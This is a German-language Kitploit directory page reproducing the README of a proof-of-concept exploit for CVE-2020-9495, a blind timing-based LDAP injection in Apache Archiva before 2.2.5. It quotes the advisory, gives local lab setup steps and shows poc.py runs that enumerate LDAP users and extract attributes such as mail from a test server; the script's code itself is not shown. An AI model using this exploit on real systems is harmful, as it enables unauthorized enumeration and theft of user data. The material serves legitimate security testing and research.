Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2020-9495 — Proof-of-Concept-Exploit für CVE-2020-9495, eine LDAP-Injection-Sicherheitslücke in Apache Archiva. Listet LDAP-Benutzer auf und extrahiert beliebige Attributwerte mittels Blind Injection. | Kitploit
Tools/GitHubGitHub/ggolawski/cve-2020-9495
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubggolawski/cve-2020-9495

CVE-2020-9495

Proof-of-Concept-Exploit für CVE-2020-9495, eine LDAP-Injection-Sicherheitslücke in Apache Archiva. Listet LDAP-Benutzer auf und extrahiert beliebige Attributwerte mittels Blind Injection.

Repository anzeigen
8143vor 6 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2020-9495 PoC

CVE-2020-9495 ist eine LDAP-Injection-Schwachstelle mittleren Schweregrads in Apache Archiva Versionen vor 2.2.5. Sie erlaubt einem Angreifer, beliebige LDAP-Attributwerte von Benutzern, die auf dem LDAP-Server existieren, abzurufen.

Aus der offiziellen Apache-Archiva-Sicherheitsmeldung:

Durch die Eingabe spezieller Werte in das Archiva-Anmeldeformular kann ein Angreifer Benutzerattributdaten vom verbundenen LDAP-Server abrufen. Mit bestimmten Zeichen ist es möglich, den LDAP-Filter zu modifizieren, der zum Abfragen der Benutzer auf dem verbundenen LDAP-Server verwendet wird. Durch Messung der Antwortzeit können beliebige Attributdaten von LDAP-Benutzerobjekten abgerufen werden.

PoC

Das Skript poc.py zeigt, wie ein nicht autorisierter Angreifer Benutzer auf dem mit Archiva integrierten LDAP-Server enumerieren und den Wert eines beliebigen Attributs eines beliebigen Benutzers abrufen kann.

Lokaler Archiva-Testserver

Überspringen Sie diesen Schritt, wenn Sie bereits einen Archiva-Server mit aktivierter LDAP-Authentifizierung haben.

  1. Laden Sie Archiva 2.2.4 herunter und entpacken Sie es

    $ wget https://archive.apache.org/dist/archiva/2.2.4/binaries/apache-archiva-2.2.4-bin.tar.gz
    $ tar -zxf apache-archiva-2.2.4-bin.tar.gz
    
  2. Führen Sie den OpenLDAP-Server aus

    $ docker run -p 2389:389 --name my-openldap-container osixia/openldap:1.3.0
    
  3. Importieren Sie Benutzer aus users.ldif in LDAP

    $ ldapadd -x -D "cn=admin,dc=example,dc=org" -w admin -H ldap://localhost:2389 -f users.ldif
    
  4. Führen Sie den Archiva-Server aus

    $ bin/archiva console
    
  5. Aktivieren und konfigurieren Sie die LDAP-Authentifizierung über die Weboberfläche

Benutzer enumerieren

$ ./poc.py --url http://127.0.0.1:8080
[INFO] Enumerating users from http://127.0.0.1:8080
[INFO] Calibration...
[INFO] Calibration done
admin1
admin2
admin3
admin4
admin5
admin6
admin7
user1
user2
user3
user4

LDAP-Attributwerte des Benutzers admin1 abrufen

$ ./poc.py --url http://127.0.0.1:8080 --user admin1 --attr mail
[INFO] Exfiltrating mail attribute of admin1 user from http://127.0.0.1:8080
[INFO] Calibration...
[INFO] Calibration done
[email protected]
$ ./poc.py --url http://127.0.0.1:8080 --user admin1 --attr givenName
[INFO] Exfiltrating givenName attribute of admin1 user from http://127.0.0.1:8080
[INFO] Calibration...
[INFO] Calibration done
admin1
$ ./poc.py --url http://127.0.0.1:8080 --user admin1 --attr sn
[INFO] Exfiltrating sn attribute of admin1 user from http://127.0.0.1:8080
[INFO] Calibration...
[INFO] Calibration done
last
Tool herunterladen